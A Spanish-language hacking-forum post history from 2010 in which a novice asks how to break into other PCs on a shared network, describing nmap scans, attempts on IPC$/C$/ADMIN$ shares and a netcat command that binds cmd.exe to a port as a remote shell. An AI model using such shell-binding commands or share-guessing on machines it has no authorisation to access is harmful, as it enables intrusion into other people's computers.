elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / Re: Ayuda sobre netcat en: 2 Marzo 2010, 16:14 pm
Ok, ya conocia algunos de esos links pero los mirare mas detenidamente pero una cosa.
En todos los tutoriales del netcat que he visto creo que no hacen distincion entre servidor y cliente ¿cual es la diferencia?
2  Seguridad Informática / Hacking / Re: Ayuda sobre netcat en: 1 Marzo 2010, 20:23 pm
Para que engañarnos apenas he empezado con el netcat, no obstante ¿no podrias concretar un poco sobre que manuales concretamente?
Gracias
3  Seguridad Informática / Hacking / Ayuda sobre netcat en: 1 Marzo 2010, 20:04 pm
Hola, ayudandome de nmap he conseguido ver los puertos abiertos de una red de ordenadores y me han comentado que para poder acceder a un equipo el mejor programa que existe es netcat, me estoy mirando este tutorial

http://foro.elhacker.net/tutoriales_documentacion/el_netcat_la_navaja_suiza_de_los_hackers_y_administradores-t15859.0.html

muy bueno por cierto, pero no hay forma humana de que funcione nada, ademas las posibilidades son mas bien pocas y creo que son puertos que no se pueden cerrar y que estan abiertos por que no puedes entrar de ningun modo como son
80/tcp   open   http
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389

estos son los unicos que estan abiertos y usando este comando del netcat

nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe

se queda pensando eternamente y no te lleva a nada.

¿En esta situacion puedo entrar a un equipo?

Por cierto ¿que es un proggie? ¿y que es entrar en modo verbose?
4  Seguridad Informática / Hacking / ¿Como conseguir entrar en un pc ajeno con recursos compartidos por el puerto 80? en: 23 Febrero 2010, 03:06 am
Hola, estoy en una red e intento conseguir llegar a las unidades de disco duro del pc.
Usando un tuto que he visto por ahi para entrar por netbios, consigo llegar al pc que tiene recursos compartidos, pero al poner la IP y IPC$ o C$ o ADMIN$, siempre me suelta una contraseña para que la ponga en la cuenta de invitado del otro equipo, me gustaria poder poner una contraseña valida pero no funciona ninguna, y no hay forma humana de poder entrar al equipo.

A ser posible me gustaria no usar el nmap, y me preguntaba si hay alguna forma de entrar por el puerto 80 mediante la barra de direcciones, no obstante si hay alguna forma mejor bienvenido sea.

En todos los equipos esta instalado el servidor apache para hacer pruebas con php y desde mi ordenador puedo ver todos los proyectos simplemente poniendo la ip del ordenador en cuestion, digo esto por si al estar instalado apache se abre alguna posibilidad mas de entrar.

Si es posible no me gustaria instalar nada, a no ser que sea portable.

Gracias.

PD: Por cierto he leido multitud de tutoriales pero ninguno que funcione hasta ahora, de hecho el unico modo que he visto es via net use.
El sistema operativo es windows xp profesional, y puedo conseguir la mac del equipo, por si sirve de algo.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines